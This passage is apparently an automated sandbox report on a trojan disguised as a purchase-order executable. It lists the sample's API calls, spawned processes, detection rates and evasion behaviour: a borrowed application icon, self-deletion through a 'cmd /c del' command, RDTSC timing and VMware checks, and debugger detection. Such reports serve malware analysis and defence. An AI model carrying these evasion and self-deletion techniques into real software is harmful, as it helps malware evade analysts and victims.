          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD8300 NtClose,16_2_00DD8300
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD81CA NtCreateFile,16_2_00DD81CA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD82CA NtReadFile,16_2_00DD82CA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD82FA NtClose,16_2_00DD82FA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD827A NtReadFile,16_2_00DD827A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD83AB NtAllocateVirtualMemory,16_2_00DD83AB
          Source: PO 56720012359.exe, 00000001.00000003.247597225.0000000002FFF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO 56720012359.exe
          Source: PO 56720012359.exe, 00000003.00000002.329509813.000000000156F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO 56720012359.exe
          Source: PO 56720012359.exe, 00000003.00000002.330426042.0000000003350000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs PO 56720012359.exe
          Source: PO 56720012359.exeVirustotal: Detection: 50%
          Source: PO 56720012359.exeReversingLabs: Detection: 40%
          Source: PO 56720012359.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO 56720012359.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO 56720012359.exe 'C:\Users\user\Desktop\PO 56720012359.exe'
          Source: C:\Users\user\Desktop\PO 56720012359.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO 56720012359.exeProcess created: C:\Users\user\Desktop\PO 56720012359.exe 'C:\Users\user\Desktop\PO 56720012359.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO 56720012359.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO 56720012359.exeProcess created: C:\Users\user\Desktop\PO 56720012359.exe 'C:\Users\user\Desktop\PO 56720012359.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO 56720012359.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@8/5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B1450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,1_2_008B1450
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_008B1450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,3_2_008B1450
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B1450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,1_2_008B1450
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO 56720012359.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: PO 56720012359.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: PO 56720012359.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: PO 56720012359.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: PO 56720012359.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: PO 56720012359.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: PO 56720012359.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: PO 56720012359.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: cscript.pdbUGP source: PO 56720012359.exe, 00000003.00000002.330426042.0000000003350000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO 56720012359.exe, 00000001.00000003.249848116.0000000002D80000.00000004.00000001.sdmp, PO 56720012359.exe, 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, cscript.exe, 00000010.00000003.329208174.0000000005160000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO 56720012359.exe, cscript.exe
          Source: Binary string: cscript.pdb source: PO 56720012359.exe, 00000003.00000002.330426042.0000000003350000.00000040.00020000.sdmp
          Source: PO 56720012359.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: PO 56720012359.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: PO 56720012359.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: PO 56720012359.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: PO 56720012359.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B3B85 push ecx; ret 1_2_008B3B98
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_00416087 push cs; ret 3_2_0041608A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041B9CF push edi; ret 3_2_0041B9D1
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041C9D1 push es; ret 3_2_0041C9D3
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_00415262 push esp; iretd 3_2_00415263
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041B3C5 push eax; ret 3_2_0041B418
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041B47C push eax; ret 3_2_0041B482
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041B412 push eax; ret 3_2_0041B418
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0041B41B push eax; ret 3_2_0041B482
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_00414FB9 pushad ; ret 3_2_00414FBF
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_008B3B85 push ecx; ret 3_2_008B3B98
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0133D0D1 push ecx; ret 3_2_0133D0E4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0537D0D1 push ecx; ret 16_2_0537D0E4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD6087 push cs; ret 16_2_00DD608A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DDC9D1 push es; ret 16_2_00DDC9D3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DDB9CF push edi; ret 16_2_00DDB9D1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD5262 push esp; iretd 16_2_00DD5263
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DDB3C5 push eax; ret 16_2_00DDB418
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DDB47C push eax; ret 16_2_00DDB482
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DDB41B push eax; ret 16_2_00DDB482
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DDB412 push eax; ret 16_2_00DDB418
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00DD4FB9 pushad ; ret 16_2_00DD4FBF
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B1450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree,1_2_008B1450

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (15).png
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del 'C:\Users\user\Desktop\PO 56720012359.exe'
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del 'C:\Users\user\Desktop\PO 56720012359.exe'Jump to behavior
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B2FCD RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_008B2FCD
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO 56720012359.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO 56720012359.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000DC85F4 second address: 0000000000DC85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000DC898E second address: 0000000000DC8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6476Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004088C0 rdtsc 3_2_004088C0
          Source: C:\Users\user\Desktop\PO 56720012359.exeProcess information queried: ProcessInformationJump to behavior
          Source: explorer.exe, 00000005.00000000.315506357.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.273233836.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: cscript.exe, 00000010.00000002.508575985.000000000365E000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000005.00000000.272485902.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000005.00000000.278989155.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000005.00000000.289003104.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000005.00000000.278989155.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B4E99 _memset,IsDebuggerPresent,1_2_008B4E99
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B5AC5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_008B5AC5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B10B0 ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapFree,1_2_008B10B0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_004088C0 rdtsc 3_2_004088C0
          Source: C:\Users\user\Desktop\PO 56720012359.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131513A mov eax, dword ptr fs:[00000030h]3_2_0131513A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131513A mov eax, dword ptr fs:[00000030h]3_2_0131513A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01304120 mov eax, dword ptr fs:[00000030h]3_2_01304120
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01304120 mov eax, dword ptr fs:[00000030h]3_2_01304120
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01304120 mov eax, dword ptr fs:[00000030h]3_2_01304120
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01304120 mov eax, dword ptr fs:[00000030h]3_2_01304120
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01304120 mov ecx, dword ptr fs:[00000030h]3_2_01304120
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E9100 mov eax, dword ptr fs:[00000030h]3_2_012E9100
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E9100 mov eax, dword ptr fs:[00000030h]3_2_012E9100
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E9100 mov eax, dword ptr fs:[00000030h]3_2_012E9100
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EC962 mov eax, dword ptr fs:[00000030h]3_2_012EC962
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EB171 mov eax, dword ptr fs:[00000030h]3_2_012EB171
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EB171 mov eax, dword ptr fs:[00000030h]3_2_012EB171
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130B944 mov eax, dword ptr fs:[00000030h]3_2_0130B944
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130B944 mov eax, dword ptr fs:[00000030h]3_2_0130B944
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013651BE mov eax, dword ptr fs:[00000030h]3_2_013651BE
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013651BE mov eax, dword ptr fs:[00000030h]3_2_013651BE
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013651BE mov eax, dword ptr fs:[00000030h]3_2_013651BE
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013651BE mov eax, dword ptr fs:[00000030h]3_2_013651BE
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013669A6 mov eax, dword ptr fs:[00000030h]3_2_013669A6
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013161A0 mov eax, dword ptr fs:[00000030h]3_2_013161A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013161A0 mov eax, dword ptr fs:[00000030h]3_2_013161A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01312990 mov eax, dword ptr fs:[00000030h]3_2_01312990
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130C182 mov eax, dword ptr fs:[00000030h]3_2_0130C182
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131A185 mov eax, dword ptr fs:[00000030h]3_2_0131A185
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EB1E1 mov eax, dword ptr fs:[00000030h]3_2_012EB1E1
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EB1E1 mov eax, dword ptr fs:[00000030h]3_2_012EB1E1
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EB1E1 mov eax, dword ptr fs:[00000030h]3_2_012EB1E1
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013741E8 mov eax, dword ptr fs:[00000030h]3_2_013741E8
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FB02A mov eax, dword ptr fs:[00000030h]3_2_012FB02A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FB02A mov eax, dword ptr fs:[00000030h]3_2_012FB02A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FB02A mov eax, dword ptr fs:[00000030h]3_2_012FB02A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FB02A mov eax, dword ptr fs:[00000030h]3_2_012FB02A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131002D mov eax, dword ptr fs:[00000030h]3_2_0131002D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131002D mov eax, dword ptr fs:[00000030h]3_2_0131002D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131002D mov eax, dword ptr fs:[00000030h]3_2_0131002D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131002D mov eax, dword ptr fs:[00000030h]3_2_0131002D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131002D mov eax, dword ptr fs:[00000030h]3_2_0131002D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01367016 mov eax, dword ptr fs:[00000030h]3_2_01367016
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01367016 mov eax, dword ptr fs:[00000030h]3_2_01367016
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01367016 mov eax, dword ptr fs:[00000030h]3_2_01367016
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B4015 mov eax, dword ptr fs:[00000030h]3_2_013B4015
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B4015 mov eax, dword ptr fs:[00000030h]3_2_013B4015
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A2073 mov eax, dword ptr fs:[00000030h]3_2_013A2073
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B1074 mov eax, dword ptr fs:[00000030h]3_2_013B1074
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01300050 mov eax, dword ptr fs:[00000030h]3_2_01300050
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01300050 mov eax, dword ptr fs:[00000030h]3_2_01300050
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131F0BF mov ecx, dword ptr fs:[00000030h]3_2_0131F0BF
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131F0BF mov eax, dword ptr fs:[00000030h]3_2_0131F0BF
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131F0BF mov eax, dword ptr fs:[00000030h]3_2_0131F0BF
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013120A0 mov eax, dword ptr fs:[00000030h]3_2_013120A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013120A0 mov eax, dword ptr fs:[00000030h]3_2_013120A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013120A0 mov eax, dword ptr fs:[00000030h]3_2_013120A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013120A0 mov eax, dword ptr fs:[00000030h]3_2_013120A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013120A0 mov eax, dword ptr fs:[00000030h]3_2_013120A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013120A0 mov eax, dword ptr fs:[00000030h]3_2_013120A0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013290AF mov eax, dword ptr fs:[00000030h]3_2_013290AF
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E9080 mov eax, dword ptr fs:[00000030h]3_2_012E9080
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01363884 mov eax, dword ptr fs:[00000030h]3_2_01363884
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01363884 mov eax, dword ptr fs:[00000030h]3_2_01363884
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E58EC mov eax, dword ptr fs:[00000030h]3_2_012E58EC
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137B8D0 mov eax, dword ptr fs:[00000030h]3_2_0137B8D0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137B8D0 mov ecx, dword ptr fs:[00000030h]3_2_0137B8D0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137B8D0 mov eax, dword ptr fs:[00000030h]3_2_0137B8D0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137B8D0 mov eax, dword ptr fs:[00000030h]3_2_0137B8D0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137B8D0 mov eax, dword ptr fs:[00000030h]3_2_0137B8D0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137B8D0 mov eax, dword ptr fs:[00000030h]3_2_0137B8D0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A131B mov eax, dword ptr fs:[00000030h]3_2_013A131B
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01313B7A mov eax, dword ptr fs:[00000030h]3_2_01313B7A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01313B7A mov eax, dword ptr fs:[00000030h]3_2_01313B7A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EDB60 mov ecx, dword ptr fs:[00000030h]3_2_012EDB60
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B8B58 mov eax, dword ptr fs:[00000030h]3_2_013B8B58
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EDB40 mov eax, dword ptr fs:[00000030h]3_2_012EDB40
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EF358 mov eax, dword ptr fs:[00000030h]3_2_012EF358
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01314BAD mov eax, dword ptr fs:[00000030h]3_2_01314BAD
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01314BAD mov eax, dword ptr fs:[00000030h]3_2_01314BAD
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01314BAD mov eax, dword ptr fs:[00000030h]3_2_01314BAD
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B5BA5 mov eax, dword ptr fs:[00000030h]3_2_013B5BA5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F1B8F mov eax, dword ptr fs:[00000030h]3_2_012F1B8F
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F1B8F mov eax, dword ptr fs:[00000030h]3_2_012F1B8F
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131B390 mov eax, dword ptr fs:[00000030h]3_2_0131B390
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01312397 mov eax, dword ptr fs:[00000030h]3_2_01312397
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A138A mov eax, dword ptr fs:[00000030h]3_2_013A138A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0139D380 mov ecx, dword ptr fs:[00000030h]3_2_0139D380
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013103E2 mov eax, dword ptr fs:[00000030h]3_2_013103E2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013103E2 mov eax, dword ptr fs:[00000030h]3_2_013103E2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013103E2 mov eax, dword ptr fs:[00000030h]3_2_013103E2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013103E2 mov eax, dword ptr fs:[00000030h]3_2_013103E2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013103E2 mov eax, dword ptr fs:[00000030h]3_2_013103E2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013103E2 mov eax, dword ptr fs:[00000030h]3_2_013103E2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130DBE9 mov eax, dword ptr fs:[00000030h]3_2_0130DBE9
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013653CA mov eax, dword ptr fs:[00000030h]3_2_013653CA
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013653CA mov eax, dword ptr fs:[00000030h]3_2_013653CA
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01324A2C mov eax, dword ptr fs:[00000030h]3_2_01324A2C
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01324A2C mov eax, dword ptr fs:[00000030h]3_2_01324A2C
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F8A0A mov eax, dword ptr fs:[00000030h]3_2_012F8A0A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01303A1C mov eax, dword ptr fs:[00000030h]3_2_01303A1C
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EAA16 mov eax, dword ptr fs:[00000030h]3_2_012EAA16
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EAA16 mov eax, dword ptr fs:[00000030h]3_2_012EAA16
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E5210 mov eax, dword ptr fs:[00000030h]3_2_012E5210
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E5210 mov ecx, dword ptr fs:[00000030h]3_2_012E5210
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E5210 mov eax, dword ptr fs:[00000030h]3_2_012E5210
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012E5210 mov eax, dword ptr fs:[00000030h]3_2_012E5210
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0132927A mov eax, dword ptr fs:[00000030h]3_2_0132927A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0139B260 mov eax, dword ptr fs:[00000030h]3_2_0139B260
